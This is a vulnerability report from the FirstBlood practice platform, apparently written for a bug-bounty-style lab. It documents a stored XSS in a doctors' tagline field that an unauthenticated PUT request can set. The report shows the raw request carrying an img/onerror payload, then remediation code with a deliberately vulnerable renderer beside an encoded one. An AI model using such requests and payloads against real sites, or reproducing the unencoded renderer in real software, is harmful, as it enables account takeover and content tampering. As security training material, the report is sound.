FirstBlood-#1785 — Stored XSS with tagline
This issue was discovered on FirstBlood v3
On 2022-12-16, pichik Level 4 reported:
Hi,
I don't know why it took me so long to find where the tagline is used, but here it is.
DESCRIPTION:
With the new /api/managedoctors.php endpoint reported before, a new param tagline is revealed to us.
This parameter is vulnerable to stored XSS at the /meet_drs.php endpoint.
There is no filtering or encoding in place, so the payload is as simple as <img src=/ onerror=alert(1)>.
Here is the PUT request:
PUT /api/managedoctors.php HTTP/1.1
Host: 8cb7021a2c6a-pichik.a.firstbloodhackers.com
X-Site-Req: permitted
Content-Length: 89
Content-Type:application/xml
{
"name":"test",
"bio":"test",
"tagline":"<img src=/ onerror=alert(1)>",
"drId":"1"
}
POC URL:
This is the endpoint where XSS is triggered:
https://8cb7021a2c6a-pichik.a.firstbloodhackers.com/meet_drs.php
POC SCREEN:
IMPACT:
This can be combined with other bugs to steal accounts, etc.
REMEDIATION:
Use HTML encoding for all user input.
Remove public access to /api/managedoctors.php.
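The two remediations above, illustrated as an added example (this is not FirstBlood's code): a vulnerable tagline renderer next to its hardened form, plus an authorization gate for the PUT endpoint. The function names, the shape of the $doctor array, the session keys and the sample record are assumptions for illustration; the sample tagline is the payload quoted in the report.

```php
<?php
// Added example, not the FirstBlood application's own code.
// Function names, $doctor array shape and session keys are assumptions.

// Vulnerable rendering (the meet_drs.php behaviour described above):
// the tagline is interpolated raw, so any markup in it is parsed by the
// browser as HTML and event handlers run.
function render_tagline_vulnerable(array $doctor): string {
    return '<p class="tagline">' . $doctor['tagline'] . '</p>';
}

// Hardened rendering: encode for the HTML text-node context at output time.
// ENT_QUOTES covers both quote styles (also safe if reused in an attribute),
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function render_tagline_safe(array $doctor): string {
    $encoded = htmlspecialchars(
        $doctor['tagline'],
        ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5,
        'UTF-8'
    );
    return '<p class="tagline">' . $encoded . '</p>';
}

// Second remediation: the PUT handler for /api/managedoctors.php must not be
// reachable anonymously. Require an authenticated session with a privileged
// role before touching any doctor record (role name is an assumption).
function authorize_manage_doctors(): void {
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['user_id']) || ($_SESSION['role'] ?? '') !== 'admin') {
        http_response_code(403);
        header('Content-Type: application/json');
        echo json_encode(['error' => 'forbidden']);
        exit;
    }
}

// Constructed sample record using the tagline from the report.
$doctor = [
    'drId'    => 1,
    'name'    => 'test',
    'bio'     => 'test',
    'tagline' => '<img src=/ onerror=alert(1)>',
];

echo render_tagline_vulnerable($doctor), PHP_EOL;
echo render_tagline_safe($doctor), PHP_EOL;
```

Encoding belongs at the point of output, as in render_tagline_safe, rather than on input: a stored value may later be emitted into a different context (attribute, JavaScript, JSON), and each context needs its own encoder. The authorization check is independent of the encoding fix; fixing only one of the two leaves either an unauthenticated write or an injection sink in place.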
P2 High
Endpoint: /api/managedoctors.php
Parameter: tagline
Payload: <img src=/ onerror=alert(1)>
FirstBlood ID: 75
Vulnerability Type: Access_control
An unauthenticated user can modify doctors via a PUT request on the /api/managedoctors.php endpoint.
FirstBlood ID: 70
Vulnerability Type: Stored XSS
Doctors can have taglines set; however, the tagline is vulnerable to stored XSS on meet_drs.php.